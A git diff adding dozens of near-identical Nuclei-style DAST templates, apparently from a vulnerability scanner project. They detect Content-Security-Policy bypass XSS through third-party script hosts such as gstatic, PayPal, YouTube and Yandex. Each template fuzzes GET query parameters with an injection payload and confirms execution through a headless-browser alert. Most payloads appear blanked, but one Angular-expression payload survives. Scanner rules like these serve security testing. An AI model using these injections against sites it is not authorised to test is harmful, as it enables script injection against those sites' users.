+ verified: true
+ tags: xss,csp-bypass,gstatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_gstatic_recaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_gstatic_recaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml
new file mode 100644
index 00000000000..65bdba26478
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-meteoprog-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Meteoprog
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,meteoprog
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_meteoprog_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_meteoprog_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml
new file mode 100644
index 00000000000..1c3983f9470
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-microsoft-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Microsoft API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,microsoft
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_microsoft_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_microsoft_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml
new file mode 100644
index 00000000000..18d09a3730a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-paypal-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via PayPal API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,paypal
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_paypal_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_paypal_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..5413aeeaf52
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-recaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via ReCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,recaptcha
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_recaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_recaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml
new file mode 100644
index 00000000000..ec114e8d865
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-reddit-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Reddit API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,reddit
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_reddit_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_reddit_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml
new file mode 100644
index 00000000000..aa997321c6c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-roblox-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Roblox API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,roblox
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_roblox_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_roblox_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml
new file mode 100644
index 00000000000..802a283244f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-st-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via ST
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,st
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_st_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_st_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml
new file mode 100644
index 00000000000..22618996e13
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-yastat-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yastat
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yastat
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_yastat_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_yastat_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml
new file mode 100644
index 00000000000..69cd3522fde
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-yastatic-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yastatic
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yastatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_yastatic_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_yastatic_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml
new file mode 100644
index 00000000000..471a4bf0dcb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: www-youtube-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YouTube API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,youtube
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: www_youtube_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "www_youtube_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml
new file mode 100644
index 00000000000..0579b7c5379
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: x-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via X API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,x
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: x_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "x_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml
new file mode 100644
index 00000000000..b1d89c2432b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yahoo-ads-yap-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yahoo Ads Yap
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yahoo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: yahoo_ads_yap_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yahoo_ads_yap_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml
new file mode 100644
index 00000000000..a78fd01c02e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yandex-st-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yandex ST
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yandex
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: yandex_st_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yandex_st_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml
new file mode 100644
index 00000000000..436526cd83f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: youtube-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via YouTube
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,youtube
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: youtube_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "youtube_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml
new file mode 100644
index 00000000000..65067a2cc57
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yuedust-yuedu-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yuedust Yuedu
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yuedust
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
foo
{{ [1].reduce(value.alert, 1); }}
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: yuedust_yuedu_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yuedust_yuedu_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml
new file mode 100644
index 00000000000..e953ae350af
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: yugiohmonstrosdeduelo-blogspot-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yugioh Blogspot
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,blogspot
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: yugiohmonstrosdeduelo_blogspot_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "yugiohmonstrosdeduelo_blogspot_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml b/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml
new file mode 100644
index 00000000000..8d8f05a9bfd
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: zhike-help-360-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zhike Help 360
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zhike
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: zhike_help_360_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "zhike_help_360_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml b/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml
new file mode 100644
index 00000000000..deea2df08e2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: zhuanjia-sogou-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zhuanjia Sogou
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zhuanjia
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: zhuanjia_sogou_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "zhuanjia_sogou_csp_xss == true"
\ No newline at end of file